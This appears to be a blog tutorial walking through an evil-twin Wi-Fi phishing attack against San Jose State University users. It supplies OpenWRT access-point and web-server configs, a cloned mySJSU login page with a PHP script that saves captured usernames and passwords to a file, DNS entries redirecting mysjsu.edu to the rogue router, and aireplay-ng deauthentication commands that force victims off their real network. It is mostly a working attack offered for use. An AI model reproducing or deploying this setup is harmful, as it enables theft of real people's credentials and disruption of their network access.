Router in the Middle Attack

  1. Set-up Wireless Access Point
  2. Host malicious website clone on AP
  3. Create DHCP entry for malicious Website
  4. Deauthenticate Users
  5. Hope for success. Else try again.
  6. Comments and future development

The wireless Access Point I am using is a Onion Omega running the slightly modified version of OpenWRT.

1. Setting up the Wireless Access Point

In this case I will be creating an Access Point pretending to be part of a San Jose State Wireless Network. First we need figure out what name our wireless network should have. We will not be using an encryption to secure our AP because we want to lure as many people as possible into the honey pot AP.

This is the configuration of the wireless setup.

/etc/config/wireless

config wifi-device ‘radio0’
option type ‘mac80211’
option hwmode ‘11g’
option path ‘platform/ar933x_wmac’
option htmode ‘HT20’
option disabled ‘0’
option channel ‘9’
option txpower ‘30’
option country ‘US’

config wifi-iface
option device ‘radio0’
option network ‘wifi’
option mode ‘ap’
option encryption ‘none’

option ssid ‘not SJSU_premier’

2. Hosting a malicious website clone on the AP

Pick a website that you you want to clone and go copy its source code. The easiest way of doing this is finding a website that uses and html form for submission and changing the location that is opened by the html form on submission. “saveUserData.php” is the file that I created to save the user information.

Snippet from the index.html tag showing the beginning tag of the form used for the username and password.

<form action="saveUserData.php" method="post" id="login" name="login" autocomplete=off onSubmit="signin(document.login)">

I chose the school’s mySJSU Portal to clone.

fake mySJSU Portal running locally from PHPStorm

This is the PHP code from the saveUserData.php file.

$name = filter_input(INPUT_POST, "userid");
$password = filter_input(INPUT_POST, "pwd");
$myFile = "UserData.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = "Username: $name\n";
fwrite($fh, $stringData);
$stringData = "Password: $password\n";
fwrite($fh, $stringData);
fclose($fh);

All it does it takes the password and the username and writes it to a text file.

On the Onion Omega you need to install uhttpd as the server using opkg and configure the location of the files for the webserver so that anyone connecting to the IP Address of your router will see your malicious website.

Install PHP5, uhttpd and git on your Omega.

This is the /etc/config/uhttpd file.

config uhttpd ‘main’
list listen_http ‘0.0.0.0:80’
list listen_http ‘[::]:80’
list listen_https ‘0.0.0.0:443’
list listen_https ‘[::]:443’
list interpreter “.php=/usr/bin/php-cgi”
option redirect_https ‘1’
option home ‘/www/fakeMySJSU’
option rfc1918_filter ‘1’
option max_requests ‘3’
option max_connections ‘100’
option cert ‘/etc/uhttpd.crt’
option key ‘/etc/uhttpd.key’
option cgi_prefix ‘/cgi-bin’
option script_timeout ‘60’
option network_timeout ‘30’
option http_keepalive ‘20’
option tcp_keepalive ‘1’
option ubus_prefix ‘/ubus’

config cert ‘px5g’
option days ‘730’
option bits ‘1024’
option country ‘ZZ’
option state ‘Somewhere’
option location ‘Uknown’
option commonname ‘OpenWrt’

The first bolded line is used for PHP configuration.

The second bolded line is the location of your website on the Onion Omega.

You should now be able to connect to your access point and view the website you created being go to the IP address of your router.

If you don’t know the IP Address check the /etc/config/network file.

...
config interface ‘wifi’
option proto ‘static’
option ipaddr ‘192.168.3.1’
option netmask ‘255.255.255.0’
...

3. Create DHCP entry for malicious Website

I added the domain name I want users to try to connect to in my /etc/config/dhcp file and gave it the ip of the router.

config ‘domain’
option ‘name’ ‘mysjsu.edu’
option ‘ip’ ‘192.168.3.1’

config ‘domain’
option ‘name’ ‘www.mysjsu.edu’
option ‘ip’ ‘192.168.3.1’

4. Deauthenticating Users

Since you need people to connect to your wireless network for this scheme to work, you’ll need to deauthenticate them from their network.

We will do this using airmon-ng, airodump-ng and aireplay-ng

  1. Set your wireless interface to monitor mode using:
sudo airmon-ng start wlan0

2. Now we will need to monitor the wireless traffic to figure out the mac address of the routers.

sudo airodump-ng wlan0mon

3. Pick a router to send the deauth packets from and monitor only that mac address.

sudo airodump-ng --channel 11 --bssid 58:F3:9C:D0:21:50 wlan0mon

4. Now pick a client of the AP that you want to deauthenticate.

sudo aireplay-ng --deauth 1000 -a 58:F3:9C:D0:21:50 -c 84:38:35:48:9F:12 wlan0mon

5. Hope for success. Else try again

With some luck and a lot of deauths sent your chances of luring someone into your honeypot are increased.

6. Comments and future development

This exact thing could have been done using facebook.com as an example or google.com. I will make another example in the future illustrating what that would like like.

Using a router to host a website can also be very beneficial when you want to have an online presence that requires users to have two factor authentication using a traditional login but using physical location as a second factor. I will also illustrate this in the future.